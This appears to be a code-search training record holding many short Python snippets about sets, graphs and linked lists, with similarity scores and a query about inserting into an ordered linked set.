bubble.adj_dict[self.color]:\n\t\t\t\t\t\t\tbubble.adj_dict[self.color].append(self)\n\t\t\t\t\t\n\t\t\n\t\treturn self.adj_dict", "def all_in_set(the_set, the_list):\n return True", "def power_set(sett):\n\n powerset_so_far = {frozenset()}\n\n for element in sett:\n set.update(powerset_so_far,\\\n extend_all(element, powerset_so_far))\n \n return powerset_so_far", "def power_set(self):\n if self._is_empty():\n return Set([Set()])\n\n copy_set = self._clone()\n\n element = copy_set.__from__()\n\n power_set = copy_set.power_set()\n\n result = Set()\n\n for item in power_set:\n result += Set([Set([element]) + item]) + Set([item])\n return result", "def adyacentes(self,v):\n return list(self.vertices[v].keys())", "def adj_to(self, v):\n\n neighbours = set()\n\n for (x, y) in self._edges:\n if x == v: neighbours.add(y)\n if y == v: neighbours.add(x)\n\n return neighbours", "def SetFunction():\r\n s2 = []\r\n s3 = []\r\n s4 = []\r\n s2 = { i for i in range(21) if i%2 == 0}\r\n s3 = { i for i in range(21) if i%3 == 0}\r\n s4 = { i for i in range(21) if i%4 == 0}\r\n s2 = set(s2)\r\n s3 = set(s3)\r\n s4 = set(s4)\r\n print s3.issubset(s2)\r\n print s4.issubset(s2)", "def activity_set(act_cs):\n ai_strs = [ai for ai in act_cs.split(\",\")]\n\n if ai_strs[-1] == \"\":\n ai_strs = ai_strs[:-1]\n\n if ai_strs[0] == \".\":\n aset = set()\n else:\n aset = set([int(ai) for ai in ai_strs])\n\n return aset", "def __listunion(self, c1, c2):\n s1 = {}\n for delta in c1:\n s1[delta] = 1\n\n\tc = c1[:]\n\tfor delta in c2:\n if not s1.has_key(delta):\n\t\tc.append(delta)\n\n\treturn c", "def to_set(self) -> Set[Tuple[int, int]]:\n return set(self.steps)", "def A(self, tokens):\n\n if not tokens:\n tokens = []\n return self.A_set[tuple(tokens)]", "def joins((u,v,o)):\r\n return { W : ((u,v), (u-1,v)),\r\n S : ((u,v), (u,v-1)) }[o]", "def _as_delimited_set(self, name):\n org_type = self._get_type(name)\n if org_type == 'delimited set': return None\n valid = ['single', 'string']\n if not org_type in valid:\n msg = 'Cannot convert variable {} of type {} to delimited set!'\n raise TypeError(msg.format(name, org_type))\n if org_type == 'single':\n self._meta['columns'][name]['type'] = 'delimited set'\n self._data[name] = self._data[name].apply(\n lambda x: str(int(x)) + ';' if not np.isnan(x) else np.NaN)\n return None\n elif org_type == 'string':\n # we assume we have a delimited set in the string variable\n # delimited with a semicolon agree;disagree;agree\n original_column = self._data[name]\n # we encapsulate each line with !; ;! so that the string\n # replacement works correctly\n if original_column.dropna().tolist()[0][-1] == \";\":\n original_column = \"!;\" + original_column + \"!\"\n else:\n original_column = \"!;\" + original_column + \";!\"\n\n original_column = original_column.replace(pd.np.nan,'')\n original_column = original_column.str.replace(\"; \",\";\")\n original_column = original_column.str.replace(\" ;\",\";\")\n\n all_values_split = [i.split(\";\") for i in original_column]\n flat = [i for sublist in all_values_split for i in sublist]\n trim = [i.strip() for i in flat]\n trim = [i for i in trim if len(i)>0]\n unique = list(set(trim))\n if \"!\" in unique:\n unique.remove(\"!\")\n unique.sort()\n value_map = []\n quantipy_values = []\n for k,item in enumerate(unique):\n value_map.append((k,item))\n quantipy_values.append({'text':{self.meta()['lib']['default text']:item},'value':k})\n original_column = original_column.str.replace(\";\" + re.escape(item) + \";\",\";\" + str(k) + \";\")\n original_column = original_column.str.replace(\"; \",\";\")\n # remove the ;! !; we placed at the beginning and end of each string\n original_column = original_column.str.replace(\"!;\",\"\")\n original_column = original_column.str.replace(\"!\",\"\")\n self._meta['columns'][name]['values'] = quantipy_values\n self._meta['columns'][name]['type'] = 'delimited set'\n self._data[name] = original_column", "def rebulid_connected_set(tmp, M_x):\n g = Graph(len(tmp))\n for i in range(0, len(tmp)):\n for j in range(i, len(tmp)):\n if Is_neighbor(tmp[i], tmp[j]):\n g.addEdge(i, j)\n cc = g.connectedComponents()\n tmps = []\n x = []\n for i in range(0, len(cc)):\n x_=[]\n tmp_ = list(tmp[cc[i][0]].flatten())\n x_.append(M_x[tmp[cc[i][0]][0]][tmp[cc[i][0]][1]])\n for j in range(1, len(cc[i])):\n tmp_ = tmp_+list(tmp[cc[i][j]].flatten())\n x_.append(M_x[tmp[cc[i][j]][0]][tmp[cc[i][j]][1]])\n x.append(calculate_1_center(x_))\n tmp_ = set(tmp_)\n tmps.append(list(tmp_))\n return tmps, x", "def sat_generate_candidate_assignments(self):\n # YOUR CODE HERE\n short = min(len(c) for c in self.clauses)\n for c in self.clauses:\n if len(c) == short:\n return set(c.literals)\n # return (set(x.literals) for x in self.clauses if len(x) == min(len(c) for c in self.clauses))", "def union(a, b):\n return list(set(a) | set(b))", "def union(a, b):\n return list(set(a) | set(b))", "def handle_set(self, agent) -> Tuple[Optional[str], Any]:\n ref_obj_d = {\"filters\": self.action_dict[\"filters\"]}\n ref_objs = self.subinterpret[\"reference_objects\"](\n self, self.speaker_name, ref_obj_d, extra_tags=[\"_physical_object\"]\n )\n if len(ref_objs) == 0:\n raise ErrorWithResponse(\"I don't know what you're referring to\")\n\n triples_d = self.action_dict[\"upsert\"][\"memory_data\"].get(\"triples\")\n if len(triples_d) == 1 and triples_d[0][\"pred_text\"] == \"has_name\":\n # the set has a name; check to see if one with that name exists,\n # if so add to it, else create one with that name\n name = triples_d[0][\"obj_text\"]\n set_memids, _ = self.memory.basic_search(\n \"SELECT MEMORY FROM Set WHERE (has_name={} OR name={})\".format(name, name)\n )\n if not set_memids:\n # make a new set, and name it\n set_memid = SetNode.create(self.memory)\n self.memory.add_triple(subj=set_memid, pred_text=\"has_name\", obj_text=name)\n else:\n # FIXME, which one\n set_memid = set_memids[0]\n else:\n # an anonymous set, assuming its new, and defined to hold the triple(s)\n set_memid = SetNode.create(self.memory)\n for t in triples_d:\n self.memory.add_triple(\n subj=set_memid, pred_text=t[\"pred_text\"], obj_text=t[\"obj_text\"]\n )\n for r in ref_objs:\n self.memory.add_triple(subj=r.memid, pred_text=\"member_of\", obj=set_memid)\n\n # FIXME point to the objects put in the set, otherwise explain this better\n self.memory.dialogue_stack_append_new(Say, \"OK made those objects into a set \")\n return None, None", "def intersect(self, other):\n result = IntSet()\n map(result.insert, [e for e in self.vals if e in other.vals])\n return result", "def join(self):\n pass", "def sat_solve(self):\n # YOUR CODE HERE\n o = frozenset()\n if self.isfalse:\n return False\n elif self.istrue:\n return set()\n l = self.generate_candidate_assignments()\n print(\"assignments,\", l)\n for i in l:\n st = sat_apply_assignment(self, i)\n print(\"i:\", i, \"new set\", st)\n\n if st.istrue:\n return {i}\n elif not st.isfalse:\n sat_solve(st)\n\n return {i}", "def concat_all(self):\n return self.merge(1)", "def setOfBetas(self, free=True, fixed=False):\n s = set()\n for e in self.children:\n s = s.union(e.setOfBetas(free, fixed))\n return s", "def sets(set_id, set_name, series):\n if (set_id):\n format_set_info(find_set(set_id))\n else:\n params = build_up_set_params(set_name, series)\n print(params)\n param_list=''\n for k, v in params.items():\n param_list += (f'{k}:\"{v}\" ')\n param_list = param_list.strip()\n click.echo(param_list) \n sets = Set.where(q=param_list)\n for pset in sets:\n format_set_info(pset)", "def union(p,q):\n\tfor e in q:\n\t\tif e not in p:\n\t\t\tp.append(e)", "def construct(self):\n\n newSet = {}\n current_index = 0\n\n for key_1, value_1 in self._sets[self._currentSet].items():\n current_index += 1\n for key_2,value_2 in list(self._sets[self._currentSet].items())[current_index:]:\n # join the 2 tuples\n join = key_1 + key_2\n # remove duplicates\n join = tuple(set(join))\n # get combinations\n combined = tuple(combinations(join, self._currentSet+1))\n # sort combination\n combined = tuple(sorted(combined[0]))\n\n # append new combination to dict\n if len(combined) != 0 :\n newSet[combined] = 0\n\n self._currentSet += 1\n # append the new itemset in the sets dict \n self._sets[self._currentSet] = newSet", "def _aggregate_set_id_element_pairs(self, setpairs):\n set_ids = set([entry[0] for entry in setpairs])\n listlist = [[entry for entry in setpairs if entry[0] == set_id]\n for set_id in set_ids]\n result = [(pairlist[0][0], set([entry[1] for entry in pairlist]))\n for pairlist in listlist]\n return result" ]
[ "0.6154213", "0.60516834", "0.59407765", "0.58840305", "0.58840305", "0.582477", "0.57098496", "0.5630604", "0.5627058", "0.5624518", "0.5581384", "0.555813", "0.5543269", "0.5482053", "0.54482526", "0.544728", "0.54431444", "0.5377867", "0.5345894", "0.5336256", "0.5320816", "0.5284155", "0.5264651", "0.5228139", "0.52250856", "0.5206256", "0.5179389", "0.51730543", "0.5164909", "0.5140531", "0.5126629", "0.5103972", "0.5080006", "0.5077103", "0.5077024", "0.5074281", "0.50682825", "0.506433", "0.5062008", "0.50389147", "0.5029717", "0.50216854", "0.50166625", "0.5002637", "0.5001646", "0.5001594", "0.49987644", "0.49968064", "0.49940905", "0.4991014", "0.49808484", "0.497453", "0.49603334", "0.49592823", "0.49555734", "0.49547157", "0.4953333", "0.4948704", "0.49445522", "0.49352336", "0.49299052", "0.49277234", "0.49269614", "0.4924252", "0.49200314", "0.4919435", "0.49094024", "0.49093774", "0.4905977", "0.49052697", "0.48979932", "0.4895802", "0.48938304", "0.48905003", "0.48904538", "0.48749658", "0.48730734", "0.48679456", "0.48671395", "0.4865024", "0.48639864", "0.48630634", "0.4853432", "0.48522776", "0.48494798", "0.48455566", "0.48455465", "0.484123", "0.48379508", "0.48379508", "0.48328513", "0.4826688", "0.4826013", "0.48252118", "0.48242003", "0.48232663", "0.48183215", "0.48160008", "0.4810831", "0.48092774" ]
0.5403839
17
Add v to a ordered set s and return s. >>> s = Link(1, Link(3, Link(5))) >>> add(s, 0) Link(0, Link(1, Link(3, Link(5)))) >>> add(s, 4) Link(0, Link(1, Link(3, Link(4, Link(5))))) >>> add(s, 6) Link(0, Link(1, Link(3, Link(4, Link(5, Link(6)))))) >>> t = Link(1) >>> add(t, 0) Link(0, Link(1))
def add(s, v): if empty(s): return Link(v) head = s if head.first > v: # s = Link(v, s) #error: assigment, then s will rebind to a new object # s.first, s.rest = v, s # error s.rest = s s.first, s.rest = v, Link(s.first, s.rest) return s # head.first <= v while not empty(head.rest) and head.rest.first <= v: head = head.rest if head.first == v: return s else: head.rest = Link(v, head.rest) return s
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def add(s, v):\n if empty(s):\n return Link(v)\n if s.first > v:\n s.first, s.rest = v, Link(s.first, s.rest)\n elif s.first < v and empty(s.rest):\n s.rest = Link(v, s.rest)\n elif s.first < v:\n add(s.rest, v)\n return s", "def add(self, s):\n current = self.first()\n # case 1 : list is empty, add new node as first node\n if self.size() == 0:\n self.__add_first(s)\n return\n # case 2 : list is not empty, element to be added is smaller than all existing ones\n elif s < current.value():\n self.__add_first(s)\n return\n # case 3 : list is not empty, element is larger than value of current element\n else:\n self.__length += 1\n nxt = current.next()\n # loop until we are at the end to find where to insert element\n while nxt is not None:\n if s < nxt.value():\n n = self.Node(s, nxt)\n current.set_next(n)\n return\n current = nxt\n nxt = nxt.next()\n current.set_next(self.Node(s, None))\n return", "def adjoin2(s, v):\n if empty(s) or s.first > v:\n return Link(v, s)\n elif s.first == v:\n return s\n else:\n return Link(s.first, adjoin2(s.rest, v))", "def add(self, s, value):\n\t\thead, tail = s[0], s[1:]\n\t\tcur_node = self.root[head]\n\t\tif not tail:\n\t\t\tcur_node.value = value\n\t\t\treturn # No further recursion\n\t\tcur_node.add(tail, value)", "def adjoin(s, v):\n if contains(s, v):\n return s\n else:\n return Link(v, s)", "def add_edge(self, u, v):\r\n keys = self.d.keys()\r\n #if nodes are not in graph, add them\r\n if u not in keys:\r\n self.add_node(u)\r\n if v not in keys:\r\n self.add_node(v)\r\n #add each node to the value set of each other\r\n u_old = self.d[u]\r\n u_new = u_old.union(set(str(v)))\r\n v_old = self.d[v]\r\n v_new = v_old.union(set(str(u)))\r\n self.d.update({u:u_new, v:v_new})", "def add_edge_directed(u, v):\n adj[u].append(v)", "def add_edge_directed(u, v):\n adj[u].append(v)", "def __add__(self, _v):\n\t\tif len(self) == len(_v):\n\t\t\tans = copy.deepcopy(self)\n\t\t\tfor i in range(0, self.n):\n\t\t\t\tans[i] += _v[i]\n\t\t\treturn ans", "def add(self,l,s=True):\r\n\t\t\t\t\r\n\t\t# make line\r\n\t\ts = self.copy()\r\n\t\tl = Li(l)\r\n\t\ta = Li._condense(l,s)\r\n\t\ta = Li(a,c=False)\r\n\t\t\t\r\n\t\t# sort?\r\n\t\tif s:\r\n\t\t\ta = a.sort()\r\n\t\t\t\r\n\t\treturn a", "def add(self, v):\n if v != \"?\":\n self.n += 1\n self.lo = min(v, self.lo)\n self.hi = max(v, self.hi)\n\n if len(self.has) < the[\"nums\"]:\n self.has.append(v)\n self.is_sorted = False\n\n elif random.random() < the[\"nums\"] / self.n:\n pos = random.randint(0, len(self.has) - 1)\n self.has[pos] = v\n self.is_sorted = False", "def addEdge(self,u,v):\r\n self.graph[u].append(v)", "def connect(self, u, v):\n self.e[u].add(v)\n self.e[v].add(u)", "def add_edge(u, v):\n adj[u].append(v)\n adj[v].append(u)", "def add_edge(u, v):\n adj[u].append(v)\n adj[v].append(u)", "def addVertex(self, v):\r\n self.adjacent.setdefault(v, list())", "def add_sortedsets(self, key, score, member):\n return self.redis.zadd(key, score, member)", "def add_elements_to_set(s: set, *args) -> set:\n s.update(set(*args))\n return s", "def add_edge(self, s, e):\n self.graph[s].append(e)", "def add_edge(self, u, v):\n self.graph[u].append(v)", "def add_this_many(x, el, s):\r\n count = 0\r\n for i in range(len(s)):\r\n if s[i] == x:\r\n count +=1\r\n while count > 0:\r\n s.append(el)\r\n count -= 1", "def union_add(this, that):\n return this.add(that, fill_value=0)", "def __add__(self, v):\n self.n += 1\n self.cnt[v] += 1\n tmp = self.cnt[v]\n if tmp > self.most:\n self.most = tmp\n self.mode = v\n return v", "def __addToLevel(self, head, value):\n\n #if DEBUG: print('\\t__addToLevel({})'.format(value))\n\n cur = head\n \n if cur.next == None:\n output = self.__insert(cur,value)\n return output\n \n #cur = cur.next\n\n while cur:\n if cur.next == None or \\\n cur.val == value or\\\n cur.next.val > value:\n output = self.__insert(cur,value)\n #output = cur\n break\n cur = cur.next\n return output", "def add(self, *items):\n for item in items:\n self.unsorted.append(item)\n key = item[0]\n self.index[key] = item\n return self", "def __add__(self,l):\r\n\t\t\r\n\t\t# add\r\n\t\ta = self.add(l)\r\n\t\t\r\n\t\treturn a", "def add(self, key, value):\n newest = self._Item(key, value) # make new item instance\n walk = self._data.last() # walk backward looking for smaller key\n while walk is not None and newest < walk.element():\n walk = self._data.before(walk)\n if walk is None:\n self._data.add_first(newest) # new key is smallest\n else:\n self._data.add_after(walk, newest) # newest goes after walk", "def addEdge(this, a, b):\n if not a in this.m:\n this.m[a]=set()\n this.m[a].add(b)", "def add(self, item):\n \n previous = None\n current = self.head\n \n while current is not None:\n if current.get_data() > item:\n break\n else:\n previous = current\n current = current.get_next()\n \n n = Node(item)\n # If node is to be added at the beginning (incl. case of empty list)\n if previous is None:\n n.set_next(self.head)\n self.head = n\n else:\n previous.set_next(n)\n n.set_next(current)", "def add(self, vertex):\n if not self.first:\n self.first = vertex\n self.first.next = vertex\n self.first.prev = vertex\n else:\n next = self.first\n prev = next.prev\n next.prev = vertex\n vertex.next = next\n vertex.prev = prev\n prev.next = vertex", "def add(self, i: int, v: int) -> None:\n while i < self.size:\n self.tree[i] += v\n i += self._lsb(i)", "def union2(s, t):\n if empty(s):\n return t\n elif empty(t):\n return s\n else:\n e1, e2 = s.first, t.first\n if e1 == e2:\n return Link(e1, union2(s.rest, t.rest))\n elif e1 < e2:\n return Link(e1, union2(s.rest, t))\n elif e2 < e1:\n return Link(e2, union2(s, t.rest))", "def add(self, value):", "def add(self, key, value):\n # If the node is empty, simply insert the key-value pair.\n if not self.keys:\n self.keys.append(key)\n self.values.append([value])\n return None\n\n for i, item in enumerate(self.keys):\n # If new key matches existing key, add to list of values.\n if key == item:\n self.values[i].append(value)\n break\n\n # If new key is smaller than existing key, insert new key to the left of existing key.\n elif key < item:\n self.keys = self.keys[:i] + [key] + self.keys[i:]\n self.values = self.values[:i] + [[value]] + self.values[i:]\n break\n\n # If new key is larger than all existing keys, insert new key to the right of all\n # existing keys.\n elif i + 1 == len(self.keys):\n self.keys.append(key)\n self.values.append([value])", "def add(self):\n a = self.pop()\n b = self.pop()\n c= a+b\n self.push(c)", "def __iadd__(self, value):\n self.store.append(value)\n return self", "def add_vertex(self, v):\n v = {'x': v[0], 'y': v[1]}\n if v not in self:\n self.append(v)\n return len(self)-1\n return self.index(v)", "def add_numbers(head1,head2):\n if not head2 and head1 :\n return head1\n elif not head1 and head2 :\n return head2\n elif not head1 and not head2 :\n return head2\n else :\n return reverse(add(reverse(head1),reverse(head2)))", "def insert(self, k: int, v: int) -> None:\n i = k % self.capacity\n if not self.data[i]:\n self.data[i] = ListNode(k, v)\n else:\n cur = self.data[i]\n while True:\n if cur.pair[0] == k:\n cur.pair = (k, v)\n return\n if not cur.next:\n break\n cur = cur.next\n cur.next = ListNode(k, v)", "def _propagate_add(self, u, v):\n\n new_ancestors = list(self.ancestors(u))\n new_ancestors.append(u)\n\n to_update = list(self.descendants(v))\n to_update.append(v)\n\n self.ancestor_matrix[np.ix_(to_update, new_ancestors)] = True", "def add(self, key, value):\r\n newest = Item(key, value) # make new item instance\r\n walk = self.data.last() # walk backward looking for smaller key\r\n while walk is not None and newest < walk.element():\r\n walk = self.data.before(walk)\r\n if walk is None:\r\n self.data.add_first(newest) # new key is smallest\r\n else:\r\n self.data.add_after(walk, newest) # newest goes after walk\r", "def add(self, item):\n \"\"\"\n :type item: Node()\n :rtype None\n \"\"\"\n node = Node(item)\n if self.head == None or self.head.getData() > node.getData():\n node.setNext(self.head)\n self.head = node\n return\n \n prev = self.head\n curr = self.head\n while curr:\n if curr.getData() > node.getData():\n prev.setNext(node)\n node.setNext(curr)\n return \n prev = curr\n curr = curr.getNext()\n \n # Add to the end\n prev.setNext(node)", "def plus(self, that):\n\t\tif(self.d != that.d):\n\t\t\traise ValueError(\"Vector lengths disagree\")\n\t\tc = SparseVector(self.d)\n\t\tfor i in self.st.keys():\n\t\t\tc.put(i, self.get(i))\n\t\tfor i in that.st.keys():\n\t\t\tc.put(i, that.get(i) + c.get(i))\n\t\treturn c", "def add(self, key, value):\n new = self._Item(key, value)\n\n if self.is_empty():\n self._data.append(new)\n else:\n for i, item in enumerate(self._data):\n if new <= item:\n self._data.insert(i, new)\n break\n if i == len(self) - 1:\n self._data.append(new)\n break", "def add(self, item):\n self.update(set([item]))", "def add(self,valor):\n\n MiNodo=Nodo(valor)\n if self.size==0: \n self.first=MiNodo\n else:\n current=self.first\n while current.next!=None:\n current=current.next \n current.next=MiNodo\n\n self.size+=1\n\n return MiNodo", "def __add__(self, other):\n if not isinstance(other, (list, Set)):\n raise TypeError(\"sets can only be joined with sets\")\n new_set = self._clone()\n for element in other:\n new_set._insert(element)\n return new_set", "def get_or_add(self, s):\n if s not in self.str2Id:\n self.id2Str[self.nextId] = s\n self.str2Id[s] = self.nextId\n self.id2freq[self.nextId] = 1\n self.nextId += 1\n else:\n self.id2freq[self.str2Id[s]] += 1\n return self.str2Id[s]", "def addInLink(source, target):\n if inlinkGraph.has_key(source):\n # if target not in inlinkGraph[source]:# uncomment to remove repetitives\n inlinkGraph[source].append(target)\n inlinkGraphDegree[source] = inlinkGraphDegree[source] + 1\n else:\n inlinkGraph[source].append(target)\n inlinkGraphDegree[source] = 1", "def addend_in_2(s):\n return head_of_list(plus, s)", "def __add__(self,other):\n self._obj['u'] += other._obj['u']\n self._obj['v'] += other._obj['v']\n return self._obj", "def add_item(self, key, item):\n self[key].add(item)\n try:\n self._reverse_store[item].add(key)\n except KeyError:\n self._reverse_store[item] = set([key])", "def add(self, c, result):\n cs = c[:]\n cs.sort()\n\n p = self\n for start in range(len(c)):\n if not p.tail.has_key(c[start]):\n p.tail[c[start]] = OutcomeCache()\n p = p.tail[c[start]]\n \n p.result = result", "def add(self, key: keyType, value: valueType) -> None:\n\n self.validate(key, value)\n hash_address = self.get_hash_address(key)\n head_node = self.hashTable[hash_address]\n\n # To uniform form of key\n uniform_key = key\n if isinstance(key, (list, set)):\n uniform_key = tuple(key)\n # else:\n # uniform_key = key\n # Create a new node and assign values.\n node_new = ChainNode()\n node_new.key = uniform_key\n node_new.values.append(value)\n\n # 'head_node.count == 0' means that there is no collision.\n if head_node.count == 0:\n head_node.singlyLinkedList.append(node_new)\n head_node.count = 1\n head_node.keys.append(uniform_key)\n else:\n # To deal with collision.\n if uniform_key not in head_node.keys:\n head_node.singlyLinkedList.append(node_new)\n head_node.keys.append(uniform_key)\n head_node.count = head_node.count + 1\n else:\n # For the same 'key', determine whether 'value' already exists. If not, then store.\n for index in range(len(head_node.singlyLinkedList)):\n if uniform_key == head_node.singlyLinkedList[index].key:\n if value not in head_node.singlyLinkedList[index].values:\n head_node.singlyLinkedList[index].values.append(value)\n head_node.count = head_node.count + 1\n break\n logger.info(\"Successfully add a new element.\")", "def __add__(self, other):\r\n return self.add(other)", "def add(self, item):\n if item in self:\n self._set(item, self._get(item) + 1)\n else:\n self._set(item, 1)", "def add(self, item):\n # must keep two pointers marching\n # in synch down the list.\n current = self._head\n previous = None\n while current != None:\n if current.getData() > item:\n # we’ve reached the insertion spot\n break\n else:\n # otherwise, advance both pointers\n previous = current\n current = current.getNext()\n temp = Node(item)\n if previous == None:\n # insert at the start of the list\n temp.setNext(self._head)\n self._head = temp\n else:\n temp.setNext(current)\n previous.setNext(temp)", "def addNode(l: ListNode, v: int) -> ListNode:\n node = ListNode(v)\n l.next = node\n return l", "def add(self, seq, diff):\n # Insert into sorted list using linear search because it will almost always be the front\n new = (seq, diff)\n for i, curr in enumerate(reversed(self.list)):\n if new > curr:\n self.list.insert(len(self.list) - i, new)\n break\n else:\n self.list.insert(0, new)", "def add(self, item):\n \n n = Node(item)\n n.set_next(self.head)\n self.head = n", "def __add__(self, other):\n return self.add(other)", "def add(self, aVal, bVal):\n if aVal in self._forwardMap:\n self._forwardMap[aVal].add(bVal)\n else:\n self._forwardMap[aVal] = set([bVal])\n\n if bVal in self._reverseMap:\n self._reverseMap[bVal].add(aVal)\n else:\n self._reverseMap[bVal] = set([aVal])\n\n return self", "def add_vectors(v, u):\n return (v[0] + u[0], v[1] + u[1])", "def __add__(self, other):\n if not other:\n return self.clone()\n else:\n return self.using(join(self, other))", "def __iadd__(self,l):\r\n\t\t\r\n\t\treturn self.add(l)", "def add(self, value):\n # Find the tail\n tail = self.head\n while tail and tail.next:\n tail = tail.next\n\n if tail:\n # Add a new node with the value\n tail.next = Node(value, tail, None)\n else:\n # Add first node to the list\n self.head = Node(value, None, None)", "def add(self, val):\n self.lookup[val] = self.lookup.get(val, 0) + 1", "def __setitem__(self,k,v):\n self.insert(k,v)", "def waysToAddTo(numbers, addTo):\n\tdef waysToAddToImpl(numbers, addTo, numsSoFar):\n\t\tfor n in numbers:#try adding each number\n\t\t\tnextList = numsSoFar + [n]\n\t\t\tsumn = sum(nextList)\n\t\t\tif sumn == addTo:\n\t\t\t\tyield nextList\n\t\t\telif sumn < addTo:\n\t\t\t\tlowerNumbers = [num for num in numbers if num <= n]#wlog, pieces decrease in size from first to last\n\t\t\t\tyield from waysToAddToImpl(lowerNumbers, addTo, nextList)\n\t\t\telse:#sumn > addTo:\n\t\t\t\tyield from []#there has to be a better way to do this\n\t\t\t\t\n\treturn waysToAddToImpl(numbers, addTo, [])", "def __add__(self, vector):\n return self.translated(vector)", "def add(self, item):\n if not (item in self.set):\n self.set[item] = True\n heapq.heappush(self.heap, item)", "def add_sets(self, key, member):\n return self.redis.sadd(key, member)", "def put(self, k: Any, v: Any):\n i = abs(hash(k)) % self.size\n current = self.data[i]\n while current is not None:\n if current.key == k:\n current.value = v\n return\n current = current.next\n new_node = self.Node(k, v)\n new_node.next = self.data[i]\n self.data[i] = new_node", "def add(element):", "def addNode(self, new_value): # Class O(n)\r\n if type(new_value) is not int: raise ValueError(\"Please, insert an integer\")\r\n h = self.head\r\n while 'next' in dir(h.next):\r\n h = h.next\r\n else:\r\n h.next = Node(new_value)", "def add(self, val):\n self[self.hash(val)] += 1", "def __add__(self, element):\r\n self.elements += element", "def addForDijkstra(self, idx):\n self.g += graph[self.visited[-1], self.not_visited[idx]]\n self.visited.append(self.not_visited.pop(idx))", "def __add__(self, other):\n\t\tself.__seqvector.vec += other.__seqvector.vec\n\t\treturn self", "def addAtHead(self, val: int) -> None:\n pred, succ = self.head, self.head.next\n cur = Node(val)\n cur.next = succ\n cur.prev = pred\n pred.next = cur\n succ.prev = cur\n self.size += 1\n # print(\"addHead\", self.head.next.val)", "def add(self, item):\n item = self._prepare_item(len(self), item)\n if item not in self._data:\n self._data.append(item)\n self.__log__.append(SetAdd(value=item))", "def add_edge(self, u: Hashable, v: Hashable, metadata: dict):\n # If u doesn't exist:\n if self.has_node(u):\n x = self._names.get_id(u)\n else:\n x = self.add_node(u, None)\n\n if self.has_node(v):\n y = self._names.get_id(v)\n else:\n y = self.add_node(v, None)\n\n # Insert metadata for this edge, replacing the previous metadata:\n self._meta.add_edge(u, v, metadata)\n\n # TODO: Support multigraphs, and allow duplicate edges.\n if self.has_edge(u, v):\n return\n return self._nk_graph.addEdge(x, y)", "def __add__(self, other: t.Any) -> InspectableSet[_C]:\n return self._op_copy('__add__', other)", "def add(self, item):\n node = Node(item)\n node.next = self.head\n self.head = node", "def add_sorted(self, val):\n if self.root is None:\n self.root = TreeNode(val)\n else:\n self._add_sorted(val, self.root)", "def add_edge(self, u: str, v: str) -> None:\n if (u == v):\n return\n else:\n # add_vertex handles the checks\n # for if the vertices already\n # exist and if they already do,\n # nothing happens. Else it adds them\n self.add_vertex(u)\n self.add_vertex(v)\n\n # check if the edge already exists\n if self.contains_edge(u, v):\n return\n\n # create the edge\n self.adj_list[u].append(v)\n self.adj_list[v].append(u)", "def add(self, d):\n new_node = Node(d)\n self.root = new_node\n self.size += 1\n return d", "def append(self, value):\n if not self.head:\n self.head = Node(value)\n return\n link = self.head\n while link.next_value:\n link = link.next_value\n link.next_value = Node(value)\n return", "def __add__(self, this):\n return self.add(this)", "def __iadd__(self, other):\n self.append(other)\n return self", "def add(self, k, v):\n values = super(OrderedMultiDict, self).setdefault(k, [])\n self._insert(k, v)\n values.append(v)", "def extend_link(s, t):\n assert is_link(s) and is_link(t)\n if s == empty:\n return t\n else:\n return link(first(s), extend_link(rest(s), t))", "def extend_link(s, t):\n assert is_link(s) and is_link(t)\n if s == empty:\n return t\n else:\n return link(first(s), extend_link(rest(s), t))", "def sorted_insert(self, value):\n new = Node(value)\n if self.__head is None:\n self.__head = new\n return\n\n cur = self.__head\n if new.data < cur.data:\n new.next_node = self.__head\n self.__head = new\n return\n\n while (cur.next_node is not None) and (new.data > cur.next_node.data):\n cur = cur.next_node\n\n new.next_node = cur.next_node\n cur.next_node = new\n return", "def add_vertex(self, v: str) -> None:\n if self.contains_vertex(v):\n return\n else:\n self.adj_list[v] = []", "def addAtIndex(self, index, val):\n if index < 0:\n return -1\n\n p = self.head\n while index and p: # 0-index before index-th\n p = p.next\n index -= 1\n\n if p == None:\n return\n cur = linkNode(val)\n cur.next = p.next\n cur.prev = p\n if p.next:\n p.next.prev = cur\n p.next = cur\n if cur.next == None: # tail\n self.tail = cur\n # self.printList()", "def add(self, data):\n node = Node(data)\n if self.head == None:\n self.head = node\n\n else:\n traverse = self.head\n if self.head.data > node.data:\n self.head = node\n node.next = traverse\n\n if self.head.data < node.data:\n temp = self.head\n while traverse.next != None:\n if traverse.data < node.data:\n temp = traverse\n traverse = traverse.next\n\n if traverse.data < node.data:\n temp = traverse\n\n temp1 = temp.next\n temp.next = node\n node.next = temp1", "def __add__(self, other: Seq) -> Seq:\n new_sequence = self.sequence + other.sequence\n return Seq(new_sequence, self.id)", "def add(self, key, value):\n token = self.Locator(key, value, len(self._data)) # initiaize locator index\n self._data.append(token)\n self._upheap(len(self._data) - 1)\n return token", "def add(self, key, value):\n token = self.Locator(key, value, len(self._data)) # initiaize locator index\n self._data.append(token)\n self._upheap(len(self._data) - 1)\n return token" ]
[ "0.7793301", "0.6587982", "0.6429319", "0.6309428", "0.61591506", "0.60639244", "0.5989767", "0.5989767", "0.58004624", "0.5777832", "0.5752884", "0.56904775", "0.56822777", "0.56809616", "0.56809616", "0.56750697", "0.5661514", "0.56589", "0.561813", "0.5617699", "0.55932224", "0.55590105", "0.5557789", "0.55549157", "0.5538273", "0.55347526", "0.54973215", "0.5493604", "0.5422333", "0.53962153", "0.5391316", "0.5388189", "0.5363055", "0.5355532", "0.5353231", "0.5330188", "0.53139657", "0.5308398", "0.5304417", "0.5303323", "0.53032196", "0.52860385", "0.5274463", "0.5273746", "0.5269769", "0.52682304", "0.5257173", "0.52490044", "0.5244267", "0.5243065", "0.5239326", "0.52245873", "0.52083606", "0.5189934", "0.5189706", "0.5182499", "0.51812136", "0.51654196", "0.51623887", "0.51518285", "0.5147442", "0.5145601", "0.5144839", "0.5139065", "0.51264006", "0.5124947", "0.5115498", "0.5111821", "0.51086307", "0.5108088", "0.5104437", "0.5104032", "0.5100321", "0.50978714", "0.5087312", "0.5085696", "0.50782603", "0.50751495", "0.506906", "0.5067832", "0.50604254", "0.5058021", "0.5042322", "0.5040987", "0.5038629", "0.50268555", "0.5025204", "0.5019058", "0.5009529", "0.49994346", "0.49900785", "0.49833253", "0.49833253", "0.49687025", "0.49683183", "0.49665627", "0.49622712", "0.4960742", "0.49525312", "0.49525312" ]
0.7641497
1
Tests models trained on segmented logmel spectrograms.
